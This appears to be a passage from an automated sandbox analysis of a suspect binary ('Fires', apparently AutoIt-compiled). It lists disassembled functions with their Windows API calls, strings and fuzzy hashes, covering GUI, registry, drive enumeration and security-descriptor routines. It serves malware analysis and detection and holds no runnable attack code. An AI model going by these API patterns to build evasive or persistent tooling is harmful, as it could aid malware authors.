ImageList_Destroy.COMCTL32(00000000,?), ref: 00D82FEE
ImageList_Destroy.COMCTL32(00000000,?), ref: 00D82FF9

Strings

(, xrefs: 00D83035
(, xrefs: 00D82CA1
(, xrefs: 00D82B86
0, xrefs: 00D82E11

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0$($($(
API String ID: 2760611726-1684351147
Opcode ID: a9167f736b8e1354fd2422470c4ebf08091d462c356587c34813a4cbded55da5
Instruction ID: 2daf1bc430b45fd718b93bbfb0707cccc5d647b7f5cec1ee1412a18872413ae3
Opcode Fuzzy Hash: a9167f736b8e1354fd2422470c4ebf08091d462c356587c34813a4cbded55da5
Instruction Fuzzy Hash: 92129E34201211AFDB25EF18C884BB9BBE6FF44300F58856AF595DB261C731E896CBB1

Function 00DC316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00DC319B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00DC32C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00DC3306
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00DC3316
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00DC335D
GetClientRect.USER32(00000000,?), ref: 00DC3369
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00DC33B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00DC33C1
GetStockObject.GDI32(00000011), ref: 00DC33D1
SelectObject.GDI32(00000000,00000000), ref: 00DC33D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00DC33E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DC33EE
DeleteDC.GDI32(00000000), ref: 00DC33F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00DC3423
SendMessageW.USER32(00000030,00000000,00000001), ref: 00DC343A
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00DC347A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00DC348E
SendMessageW.USER32(00000404,00000001,00000000), ref: 00DC349F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00DC34D4
GetStockObject.GDI32(00000011), ref: 00DC34DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00DC34EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00DC34F4

Strings

AutoIt v3, xrefs: 00DC3355
DISPLAY, xrefs: 00DC33B7
static, xrefs: 00DC33AC, 00DC34CE
msctls_progress32, xrefs: 00DC3470

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 8f2e1970d69f4b9bd50cf2985449e8036b4bf91bf21f50796ffa693438bfe029
Instruction ID: 4293bcee6187ac89cee9cacd662cef455fa4aa3c280e03d801c10d15980b2eae
Opcode Fuzzy Hash: 8f2e1970d69f4b9bd50cf2985449e8036b4bf91bf21f50796ffa693438bfe029
Instruction Fuzzy Hash: 49B14D71A41216AFDF14DFA8CC45FAEBBB9EB48710F048119FA15E7290D774AD40CBA4

Function 00DB5524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00DB5532
GetDriveTypeW.KERNEL32(?,00DDDC30,?,\\.\,00DDDCD0), ref: 00DB560F
SetErrorMode.KERNEL32(00000000,00DDDC30,?,\\.\,00DDDCD0), ref: 00DB577B

Strings

RAMDisk, xrefs: 00DB5639
\\.\, xrefs: 00DB5584
SATA, xrefs: 00DB5715
RAID, xrefs: 00DB5700
FileBackedVirtual, xrefs: 00DB5731
Fixed, xrefs: 00DB564E
Network, xrefs: 00DB5647
Virtual, xrefs: 00DB572A
Removable, xrefs: 00DB5655, 00DB565A
SCSI, xrefs: 00DB56CF
CDROM, xrefs: 00DB5640
USB, xrefs: 00DB56F9
SSA, xrefs: 00DB56EB
SSD, xrefs: 00DB568F
SAS, xrefs: 00DB570E
ATA, xrefs: 00DB56DD
Fibre, xrefs: 00DB56F2
MMC, xrefs: 00DB5723
PhysicalDrive, xrefs: 00DB55BB
iSCSI, xrefs: 00DB5707
1394, xrefs: 00DB56E4
ATAPI, xrefs: 00DB56D6
Unknown, xrefs: 00DB5632, 00DB56C8

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 1fbd2aa6c4b5600aabac3d91c045c9d0cdd8bb2786af31b8281f49f8a69a4d7b
Instruction ID: 6b0d287a177af1b01ab78493c8259d78a74bf965640423748bd4143e12f4b038
Opcode Fuzzy Hash: 1fbd2aa6c4b5600aabac3d91c045c9d0cdd8bb2786af31b8281f49f8a69a4d7b
Instruction Fuzzy Hash: E061BF30B04A05DBC724DF24E992EFD77A1EF55350B288056E487AB299CB31ED82DB71

Function 00D42521 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D425F8
GetSystemMetrics.USER32(00000007), ref: 00D42600
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D4262B
GetSystemMetrics.USER32(00000008), ref: 00D42633
GetSystemMetrics.USER32(00000004), ref: 00D42658
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D42675
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00D42685
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D426B8
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D426CC
GetClientRect.USER32(00000000,000000FF), ref: 00D426EA
GetStockObject.GDI32(00000011), ref: 00D42706
SendMessageW.USER32(00000000,00000030,00000000), ref: 00D42711

Part of subcall function 00D419CD: GetCursorPos.USER32(?), ref: 00D419E1
Part of subcall function 00D419CD: ScreenToClient.USER32(00000000,?), ref: 00D419FE
Part of subcall function 00D419CD: GetAsyncKeyState.USER32(00000001), ref: 00D41A23
Part of subcall function 00D419CD: GetAsyncKeyState.USER32(00000002), ref: 00D41A3D

SetTimer.USER32(00000000,00000000,00000028,00D4199C), ref: 00D42738

Strings

<), xrefs: 00D4255C
<), xrefs: 00D839A6
(, xrefs: 00D83909
AutoIt v3 GUI, xrefs: 00D426B0
(, xrefs: 00D4271A
(, xrefs: 00D42749

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: <)$<)$AutoIt v3 GUI$($($(
API String ID: 1458621304-3080182634
Opcode ID: c3adf674525c22348cb8d54d9380ca6cc78705d9f5108182c885b122db07d2d5
Instruction ID: e3049266e3bd716ab57968a5952e625a57c995bfa0f3fd8786e94feac4ac1734
Opcode Fuzzy Hash: c3adf674525c22348cb8d54d9380ca6cc78705d9f5108182c885b122db07d2d5
Instruction Fuzzy Hash: 68B15A31A01209AFDF14EFA8DC45BAE7BB5EB88714F14421AFA59E7290D774E940CF60

Function 00DD1A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00DD1BC4
GetDesktopWindow.USER32 ref: 00DD1BD9
GetWindowRect.USER32(00000000), ref: 00DD1BE0
GetWindowLongW.USER32(?,000000F0), ref: 00DD1C35
DestroyWindow.USER32(?), ref: 00DD1C55
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00DD1C89
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DD1CA7
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DD1CB9
SendMessageW.USER32(00000000,00000421,?,?), ref: 00DD1CCE
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00DD1CE1
IsWindowVisible.USER32(00000000), ref: 00DD1D3D
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00DD1D58
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00DD1D6C
GetWindowRect.USER32(00000000,?), ref: 00DD1D84
MonitorFromPoint.USER32(?,?,00000002), ref: 00DD1DAA
GetMonitorInfoW.USER32(00000000,?), ref: 00DD1DC4
CopyRect.USER32(?,?), ref: 00DD1DDB
SendMessageW.USER32(00000000,00000412,00000000), ref: 00DD1E46

Strings

tooltips_class32, xrefs: 00DD1C82
(, xrefs: 00DD1DB7
0, xrefs: 00DD1B6F

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 800fdb2f67dda177cdd8e857e8c6314f517f42bb20d7da64fe864fc990f95c9b
Instruction ID: 73e55d5ea0827f04118f2baea84b6b7eace72c71225671bcb1213e72f7b81368
Opcode Fuzzy Hash: 800fdb2f67dda177cdd8e857e8c6314f517f42bb20d7da64fe864fc990f95c9b
Instruction Fuzzy Hash: 48B17B71614301AFDB14DF68C984B6AFBE5FF84310F04891AF9999B2A1D731E845CBB2

Function 00DD0CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00DD0D81
_wcslen.LIBCMT ref: 00DD0DBB
_wcslen.LIBCMT ref: 00DD0E25
_wcslen.LIBCMT ref: 00DD0E8D
_wcslen.LIBCMT ref: 00DD0F11
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00DD0F61
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DD0FA0

Part of subcall function 00D5FD52: _wcslen.LIBCMT ref: 00D5FD5D

Part of subcall function 00DA2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DA2BA5
Part of subcall function 00DA2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DA2BD7

Strings

GETSUBITEMCOUNT, xrefs: 00DD0E20, 00DD0E3B
GETITEMCOUNT, xrefs: 00DD0DB2, 00DD0DD3
GETSELECTEDCOUNT, xrefs: 00DD0F0C, 00DD0F27
VIEWCHANGE, xrefs: 00DD1111
GETSELECTED, xrefs: 00DD107D
GETTEXT, xrefs: 00DD0E88, 00DD0EA3
SELECT, xrefs: 00DD0FE4
SELECTINVERT, xrefs: 00DD101A
SELECTCLEAR, xrefs: 00DD0FC9
ISSELECTED, xrefs: 00DD0F79
DESELECT, xrefs: 00DD1038
SELECTALL, xrefs: 00DD0FB1
FINDITEM, xrefs: 00DD10C3

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: a04a6d50b71789cd066da83aa9ec0a3737bc6998a464b4f08f322459d075daf3
Instruction ID: 9af2cc851f43cfe71c46c7a11a4c74b880f501eac0a264e079f425baeda3f8c2
Opcode Fuzzy Hash: a04a6d50b71789cd066da83aa9ec0a3737bc6998a464b4f08f322459d075daf3
Instruction Fuzzy Hash: B2E1AB312082019BCB14EF24C95196AB7E6FFD8314F18496EF8969B3A1DB30ED45CBB1

Function 00DA16D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DA1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DA1A60
Part of subcall function 00DA1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00DA14E7,?,?,?), ref: 00DA1A6C
Part of subcall function 00DA1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DA14E7,?,?,?), ref: 00DA1A7B
Part of subcall function 00DA1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DA14E7,?,?,?), ref: 00DA1A82
Part of subcall function 00DA1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DA1A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DA1741
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DA1775
GetLengthSid.ADVAPI32(?), ref: 00DA178C
GetAce.ADVAPI32(?,00000000,?), ref: 00DA17C6
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DA17E2
GetLengthSid.ADVAPI32(?), ref: 00DA17F9
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00DA1801
HeapAlloc.KERNEL32(00000000), ref: 00DA1808
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DA1829
CopySid.ADVAPI32(00000000), ref: 00DA1830
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DA185F
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DA1881
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DA1893
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DA18BA
HeapFree.KERNEL32(00000000), ref: 00DA18C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DA18CA
HeapFree.KERNEL32(00000000), ref: 00DA18D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DA18DA
HeapFree.KERNEL32(00000000), ref: 00DA18E1
GetProcessHeap.KERNEL32(00000000,?), ref: 00DA18ED
HeapFree.KERNEL32(00000000), ref: 00DA18F4

Part of subcall function 00DA1ADF: GetProcessHeap.KERNEL32(00000008,00DA14FD,?,00000000,?,00DA14FD,?), ref: 00DA1AED
Part of subcall function 00DA1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00DA14FD,?), ref: 00DA1AF4
Part of subcall function 00DA1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00DA14FD,?), ref: 00DA1B03

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: fc48415df5ec3b2d5c3a55239138f0718e3038c87eb404878c7774e7bbbf725c
Instruction ID: 7402f9c9e16a3ba7d19148b19b6152964802f0895dc9789c57f2bdb524223369
Opcode Fuzzy Hash: fc48415df5ec3b2d5c3a55239138f0718e3038c87eb404878c7774e7bbbf725c
Instruction Fuzzy Hash: 667148B6D0121ABBDF109FA5DC44FAEBBB9EF45300F184526E915E7290D7349A05CBB0

Function 00DCCE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DCCF1D
RegCreateKeyExW.ADVAPI32(?,?,00000000,00DDDCD0,00000000,?,00000000,?,?), ref: 00DCCFA4
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00DCD004
_wcslen.LIBCMT ref: 00DCD054
_wcslen.LIBCMT ref: 00DCD0CF
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00DCD112
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00DCD221
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00DCD2AD
RegCloseKey.ADVAPI32(?), ref: 00DCD2E1
RegCloseKey.ADVAPI32(00000000), ref: 00DCD2EE
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00DCD3C0

Strings

REG_MULTI_SZ, xrefs: 00DCD155
REG_DWORD, xrefs: 00DCD264
REG_EXPAND_SZ, xrefs: 00DCD02D
REG_QWORD, xrefs: 00DCD323
REG_BINARY, xrefs: 00DCD373
REG_SZ, xrefs: 00DCD0A4

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: e34192a38042afcd2c3b95c08098c7c185a5e95a37fba04c857da1006e6a95d2
Instruction ID: 32a86a8fd7d10413b5543cee60bb1393ac461210ecb70509ea85cdc62fbe5039
Opcode Fuzzy Hash: e34192a38042afcd2c3b95c08098c7c185a5e95a37fba04c857da1006e6a95d2
Instruction Fuzzy Hash: 36121B356042019FDB14DF14C881F2AB7E6EF88754F19846DF99A9B3A2CB31ED41CBA1

Function 00DD13BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00DD1462
_wcslen.LIBCMT ref: 00DD149D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DD14F0
_wcslen.LIBCMT ref: 00DD1526
_wcslen.LIBCMT ref: 00DD15A2
_wcslen.LIBCMT ref: 00DD161D

Part of subcall function 00D5FD52: _wcslen.LIBCMT ref: 00D5FD5D

Part of subcall function 00DA3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DA3547

Strings

ISCHECKED, xrefs: 00DD177D
GETITEMCOUNT, xrefs: 00DD16BA
EXPAND, xrefs: 00DD1694
GETTOTALCOUNT, xrefs: 00DD148E, 00DD14B3
COLLAPSE, xrefs: 00DD159D, 00DD15B8
GETSELECTED, xrefs: 00DD16EA
UNCHECK, xrefs: 00DD17DA
GETTEXT, xrefs: 00DD1733
EXISTS, xrefs: 00DD1618, 00DD1633
CHECK, xrefs: 00DD1521, 00DD153C
SELECT, xrefs: 00DD17AD

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 4e06c5719e1b8efee54c62a875279c39ed70b210e8fd9514debcb21978016982
Instruction ID: 94a49d9a0968084bc82675e63a43306adb562056cfa05e2c73160e642e75ed76
Opcode Fuzzy Hash: 4e06c5719e1b8efee54c62a875279c39ed70b210e8fd9514debcb21978016982
Instruction Fuzzy Hash: 32E19F39604301AFCB14EF24C55182AB7E2FF94354B18495EF8969B3A2DB31ED49CBB1

Function 00DCD3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DCC10E,?,?), ref: 00DCD415
_wcslen.LIBCMT ref: 00DCD451
_wcslen.LIBCMT ref: 00DCD4C8
_wcslen.LIBCMT ref: 00DCD4FE
_wcslen.LIBCMT ref: 00DCD559
_wcslen.LIBCMT ref: 00DCD58F
_wcslen.LIBCMT ref: 00DCD5DF

Strings

HKEY_CLASSES_ROOT, xrefs: 00DCD553, 00DCD558
HKEY_LOCAL_MACHINE, xrefs: 00DCD4C2, 00DCD4C7
HKCC, xrefs: 00DCD60C
HKLM, xrefs: 00DCD4F8, 00DCD4FD
HKCR, xrefs: 00DCD589, 00DCD58E
HKEY_USERS, xrefs: 00DCD63F
HKU, xrefs: 00DCD650
HKCU, xrefs: 00DCD62E
HKEY_CURRENT_USER, xrefs: 00DCD61D
HKEY_CURRENT_CONFIG, xrefs: 00DCD5D9, 00DCD5DE

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: a0c76650c98a7057205a388cb8df4bdff9b3c6e0cabd214ff6c412421e1c5d03
Instruction ID: b4dfbb583f6e10b8650b2b4fdccbd377642bd7da388683f5d5780a53f8e20e1e
Opcode Fuzzy Hash: a0c76650c98a7057205a388cb8df4bdff9b3c6e0cabd214ff6c412421e1c5d03
Instruction Fuzzy Hash: 7571A83261051B8BCB109E6CCD51FBB33A39B61754B2A013DFC56A7294EA35DD45C770

Function 00DD8D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DD8DB5
_wcslen.LIBCMT ref: 00DD8DC9
_wcslen.LIBCMT ref: 00DD8DEC
_wcslen.LIBCMT ref: 00DD8E0F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00DD8E4D
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00DD6691), ref: 00DD8EA9
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DD8EE2
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00DD8F25
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DD8F5C
FreeLibrary.KERNEL32(?), ref: 00DD8F68
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DD8F78
DestroyIcon.USER32(?,?,?,?,?,00DD6691), ref: 00DD8F87
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00DD8FA4
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00DD8FB0

Strings

.dll, xrefs: 00DD8E06
.icl, xrefs: 00DD8DC3
.exe, xrefs: 00DD8DE3

Memory Dump Source

